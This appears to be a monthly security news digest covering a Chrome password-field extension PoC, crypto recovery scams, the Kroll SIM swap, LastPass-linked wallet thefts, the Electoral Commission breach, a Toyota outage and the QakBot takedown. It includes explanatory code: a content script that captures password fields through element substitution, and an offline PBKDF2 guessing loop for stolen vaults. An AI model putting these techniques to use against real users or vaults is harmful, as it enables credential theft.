August has been full of cryptocurrency activity and mass data breaches, with millions of personal records stolen in the UK and millions of dollars stolen from crypto wallets and investors.

New/Improved Techniques

Chrome Info Stealer Proof-of-Concept

Researchers at the University of Wisconsin-Madison have shown that many websites leave the contents of password fields exposed as plain text in the page's DOM, and have built a proof-of-concept (PoC) Google Chrome extension that captures them. Because the extension loads its malicious code from a remote server at run time (dynamic code injection), the static code review performed by the Chrome Web Store did not catch it. Surveying the store, the team found that around 12.5% (17,300) of extensions hold the permissions needed to exploit this weakness, and identified 190 extensions that already access password fields directly (e.g., password managers).

Running the PoC against the top 10,000 domains, the team identified two systemic problems. First, the browser permission model has no security boundary between the web page and the extension: a content script can freely read and manipulate the page's HTML elements, violating the principles of least privilege and complete mediation. Second, password-field protection on websites is weak across the board; most sites apply either no protection or protection that is easily bypassed. Even where JavaScript-based obfuscation is applied to the field, an element-substitution attack (swapping the protected input for an attacker-controlled copy) defeats it, so the extension sees the password in plain text.
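To make the two weaknesses concrete, here is the core of a content script of the kind the paragraph describes. This is an added example, not the Wisconsin team's PoC or any real extension: it shows how a content script enumerates password fields, reads their plain-text values, and detaches a page's own obfuscation listeners by element substitution. Captured values are only appended to a local array; nothing here contacts a network, and the function and variable names are this example's own.

```javascript
// Added example (not from the article or the Wisconsin team's PoC): the core
// of a content script that demonstrates the two weaknesses described above.
// A content script shares the page's DOM, so it can read any <input> and can
// swap elements out from under the page's own scripts. Captured values are
// only appended to a local array; nothing here contacts a network.

const captured = [];

// Enumerate every password field reachable from `root` (document in a browser).
function findPasswordFields(root) {
  return Array.from(root.querySelectorAll('input[type="password"]'));
}

// Direct read: the field's value is plain text in the DOM, so an 'input'
// listener sees every keystroke. Each observation is pushed to `sink`.
function captureField(field, sink) {
  const handler = () => {
    sink.push({ name: field.name || field.id || '(unnamed)', value: field.value });
  };
  field.addEventListener('input', handler);
  return handler;
}

// Element substitution: some sites register their own listeners that scrub or
// encode the value as the user types. cloneNode(false) copies the element's
// attributes but none of its event listeners, so replacing the original with
// the clone silently detaches the page's protection while the user keeps
// typing into what looks like the same box. Returns the clone.
function substituteField(field) {
  const clone = field.cloneNode(false);
  field.replaceWith(clone);
  return clone;
}

// Substitute every password field on the page, then listen on the clones.
// Returns the number of fields taken over.
function takeOverPasswordFields(root, sink) {
  const fields = findPasswordFields(root);
  for (const field of fields) {
    captureField(substituteField(field), sink);
  }
  return fields.length;
}

// Only act when a real DOM exists (i.e. when running as a content script).
if (typeof document !== 'undefined') {
  takeOverPasswordFields(document, captured);
}
```

Two points worth noting. The clone keeps the original's `name` attribute, so the form still submits normally and the user sees nothing unusual, which is what makes substitution effective against page-side obfuscation. And while Manifest V3 removes the remotely hosted code that let the PoC slip past static review, it does not change the DOM access a content script has once installed; the boundary problem the paper points to is in the permission model, not the review process.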

Cryptocurrency Recovery Scams

The FBI released a public service announcement this month warning of an increase in cryptocurrency recovery scams, which target victims who have already lost cryptocurrency to fraud, scams and theft. Victims in the US lost over $2.5 billion USD to cryptocurrency fraud alone in 2022, creating demand for recovery services.

The fraudulent recovery services operate in much the same way as the original fraudsters and thieves, using a mixture of legitimate advertising, fake social media accounts, the comment sections of cryptocurrency videos and news articles, and even bots that reply to tweets about cryptocurrency to drive the initial contact. Once some trust has been built, the scammer asks the victim to pay for the recovery in advance. After receiving payment, the scammers usually cut off communication or ask for further payments, claiming additional resources are needed to complete the recovery. The FBI warned that the scammers often claim to be affiliated with law enforcement or legal services.

Attacks / Threats

[US] Crypto Platform Data Breach Linked to Kroll Employee SIM-swap

A data breach affecting three major bankrupt cryptocurrency platforms has been traced to a Kroll employee who was the victim of a SIM-swapping attack. SIM swapping is used primarily to bypass MFA methods tied to a mobile number; in this case a T-Mobile employee transferred the Kroll employee's number to the attacker without proper authorisation or any contact with Kroll. It is unclear at this time whether the T-Mobile employee was complicit or was socially engineered; historically, both have happened.

As a result of the SIM swap, the threat actor gained access to files containing PII of bankruptcy claimants for FTX, BlockFi and Genesis, each of which had contracted Kroll to run a 'claims administration' platform managing the return of funds to claimants.

[Global] $35 Million in Stolen Cryptocurrency Linked to LastPass Breach

Security researchers have assembled a reliable set of clues linking the theft of $35 million USD from around 150 wallets to the LastPass breach of November 2022. Since the breach there have been at least 150 such heists, targeting long-time crypto investors and typically lacking the collateral damage normally seen when an adversary gains a foothold (email or mobile-number takeover, for example), with the stolen funds funnelled to the same set of blockchain addresses.

The underlying cause, and the mitigation, are relatively simple. A wallet's private key (or seed phrase) cannot be rotated, so if it was ever stored in a vault that may have been stolen, the only remedy is to move the funds to a freshly generated wallet, a step none of these victims took. That left the other known weaknesses of pre-breach vaults open to abuse: unencrypted fields (website URLs were not encrypted) let an attacker pick out the vaults worth attacking, and the lack of any enforced minimum PBKDF2 iteration count meant a vault left at an old default could be brute-forced offline in a reasonable amount of time.
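The iteration-count point is the one that decides whether a stolen vault is crackable, so here is a worked illustration. This is an added example, not from the article or from LastPass; the key derivation follows LastPass's published scheme (PBKDF2-HMAC-SHA256 with the lower-cased account e-mail as salt and a per-account iteration count), while the e-mail, master password, wordlist and any timings are constructed for the demo.

```python
# Added example (not from the article or from LastPass): why the PBKDF2
# iteration count attached to a stolen vault decides whether brute-forcing the
# master password is practical. The key derivation follows LastPass's
# published scheme, PBKDF2-HMAC-SHA256 with the account e-mail as salt and a
# per-account iteration count; older accounts were left at the long-standing
# default of 5,000 iterations (some even lower), while the client default was
# later raised to 100,100 and then 600,000. The e-mail, password, wordlist and
# timings below are constructed for the demo.
import hashlib
import time
from typing import Iterable, Optional, Tuple


def derive_vault_key(master_password: str, email: str, iterations: int) -> bytes:
    """Vault encryption key as LastPass derives it: 32-byte PBKDF2-HMAC-SHA256,
    salt = lower-cased e-mail, per-account iteration count."""
    return hashlib.pbkdf2_hmac(
        "sha256",
        master_password.encode("utf-8"),
        email.lower().encode("utf-8"),
        iterations,
        dklen=32,
    )


def crack(target_key: bytes, email: str, iterations: int,
          candidates: Iterable[str]) -> Tuple[Optional[str], int]:
    """Offline guess loop an attacker runs against a stolen vault. The e-mail
    is known and the iteration count is stored with the vault rather than kept
    secret (the client needs it to log in), so only the master password has to
    be guessed. Returns (matching password or None, guesses made)."""
    guesses = 0
    for guess in candidates:
        guesses += 1
        if derive_vault_key(guess, email, iterations) == target_key:
            return guess, guesses
    return None, guesses


def relative_cost(weak_iterations: int, strong_iterations: int) -> float:
    """PBKDF2 cost is linear in the iteration count, so this ratio is how many
    times faster a vault at the weak setting falls on the same hardware."""
    return strong_iterations / weak_iterations


def guesses_per_second(email: str, iterations: int, samples: int = 5) -> float:
    """Measure the single-core guess rate on this machine at a given count."""
    start = time.perf_counter()
    for i in range(samples):
        derive_vault_key(f"guess{i}", email, iterations)
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    email = "victim@example.com"  # constructed
    stolen_key = derive_vault_key("correct horse battery", email, 5000)
    wordlist = ["password", "letmein", "correct horse battery", "Tr0ub4dor&3"]
    print(crack(stolen_key, email, 5000, wordlist))    # ('correct horse battery', 3)
    print(crack(stolen_key, email, 100100, wordlist))  # (None, 4): wrong count, no match
    print(f"5,000 -> 600,000 iterations: {relative_cost(5000, 600000):.0f}x more work per guess")
    for n in (5000, 100100, 600000):
        print(f"{n:>7} iterations: {guesses_per_second(email, n):8.1f} guesses/s (this core)")
```

The second `crack` call shows that the iteration count is part of the derivation, so the attacker must target each vault at its own setting; a vault at 5,000 iterations costs one 120th of the work per guess of one at 600,000, and a GPU rig only widens that gap in absolute terms. Raising the count after a breach does nothing for a copy already in the attacker's hands, which is why rotating the secrets, and for a wallet that means moving the funds, is the only real fix.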

[UK] Cyber-Attack on Electoral Commission Systems

The UK Electoral Commission has disclosed a breach identified in October 2022, in which malicious actors had gained access to servers holding its email, control systems and copies of the electoral registers. The investigation found that the attackers first gained access in August 2021. The electoral registers contained names, addresses, phone numbers, dates of birth (held as the date on which the person turns 18) and email addresses for around 40 million voters who were registered to vote between 2014 and 2022.
The Electoral Commission has released an impact statement:

 “According to the risk assessment used by the Information Commissioner’s Office to assess the harm of data breaches, the personal data held on the electoral registers – typically name and address – does not in itself present a high risk to individuals. It is possible however that this data could be combined with other data in the public domain, such as that which individuals choose to share themselves, to infer patterns of behaviour or to identify and profile individuals”.

This is in line with how New Zealand's Privacy Commissioner views this type of data.

[Japan] Toyota: 36-hour Outage of 14 Manufacturing Plants

A server running out of storage during scheduled maintenance caused Toyota to halt operations at 14 of its manufacturing plants for about 36 hours in late August. Toyota runs a just-in-time production system, in which components and parts arrive at the production line as they are needed; the database that orders those parts lived on the server that filled up, so every plant using the system stopped.

Unfortunately, the backup for this database was hosted on the same server, so no failover was possible. The issue was eventually resolved by migrating the database to a larger server. The affected plants account for around a third of Toyota's total production capacity, and the outage has been estimated to have cost the company $365 million in losses.
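Both failure modes here, a data volume with too little headroom for the maintenance job and a backup that shares a filesystem with the data it protects, are cheap to test for before a change window. The following preflight script is an added example, not Toyota's tooling; the paths and the 80% threshold in the usage line are placeholders, and it relies only on POSIX `df -P` and `awk`.

```sh
#!/bin/sh
# Added example (not Toyota's tooling): pre-maintenance checks that would have
# flagged both failure modes described above: a database volume too full to
# survive the maintenance job, and a "backup" sitting on the same filesystem
# as the data it is meant to protect. Paths and thresholds are placeholders.

# Mounted filesystem (device) a path lives on, from POSIX `df -P`.
fs_of() {
  df -P "$1" | awk 'NR == 2 { print $1 }'
}

# Prints "yes" if both paths are on the same filesystem, "no" otherwise.
same_filesystem() {
  if [ "$(fs_of "$1")" = "$(fs_of "$2")" ]; then echo yes; else echo no; fi
}

# Percentage of the path's filesystem already in use, as a bare integer.
used_pct() {
  df -P "$1" | awk 'NR == 2 { sub("%", "", $5); print $5 }'
}

# Succeeds if the filesystem holding $1 is at most $2 percent full.
check_capacity() {
  [ "$(used_pct "$1")" -le "$2" ]
}

# Gate a maintenance job: data dir, backup dir, max percent used.
# Returns 0 when safe to proceed, 1 otherwise, printing every failed check.
preflight() {
  data=$1; backup=$2; max_used=$3
  status=0
  if [ "$(same_filesystem "$data" "$backup")" = yes ]; then
    echo "FAIL: backup $backup shares a filesystem with $data; a full disk takes both down" >&2
    status=1
  fi
  if ! check_capacity "$data" "$max_used"; then
    echo "FAIL: $data is $(used_pct "$data")% full, limit is $max_used%" >&2
    status=1
  fi
  if [ "$status" -eq 0 ]; then echo "OK: safe to proceed"; fi
  return "$status"
}

# Usage (placeholder paths): preflight /var/lib/parts-db /backup/parts-db 80
```

Run it as the gate in the maintenance runbook or from the job scheduler, and treat a non-zero exit as "do not start". The same-filesystem check is deliberately blunt: a backup on a different directory of the same disk is not a backup for the disk-full case, and a copy on the same server still shares its fate in a hardware or power failure, so an off-host target should be the next requirement.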

[Global] QakBot Botnet Taken Down by FBI

Operation Duck Hunt, a multinational law enforcement operation led by the FBI and involving France, Germany, Latvia, the Netherlands, Romania, the United Kingdom and the United States, seized 52 servers used by the QakBot operators to sustain their network infrastructure.

After US courts issued a warrant in late August, law enforcement were able to access US-based machines infected with the malware, seizing server lists, IP addresses and routing information used by the QakBot administrators, and pushing their own custom uninstaller to remove the malware from victim devices. Within days, further warrants allowed the seizure of servers in nearly 30 countries along with 20 cryptocurrency wallets worth $8.6 million USD. The effort freed around 700,000 victim computers from the botnet's control, and law enforcement indicated they hold enough information to notify the owners of computers searched during the investigation.

QakBot has been active since 2007 and infects Windows computers via phishing. Once the victim has been tricked into following a malicious link or opening a malicious document, the QakBot loader is installed on the device, and a variety of other malware follows, commonly keyloggers that steal user credentials and financial information. QakBot has been associated with ransomware groups, usually as the initial access vector following credential theft by QakBot itself, suggesting an affiliate structure or the sale of stolen access.
It remains to be seen if this will be the end of the QakBot operation.

[UK] Government Issues Notification: Voter Registration Not a Scam

Each year, councils across the UK contact residents asking them to confirm or update their details on the electoral register, with notices delivered by a mixture of traditional mail and email. The notices carry a security code that must be entered on the response website, householdresponse.com, which is where the issues begin.

Not only does the site lack the domain expected of a UK government service (.gov.uk), but it also has the look of a hastily thrown-together scam site. Council representatives have been replying to tweets to assure residents that the emails are legitimate, and many council websites now carry banners saying the same.
Residents who do not respond may be fined up to £1,000.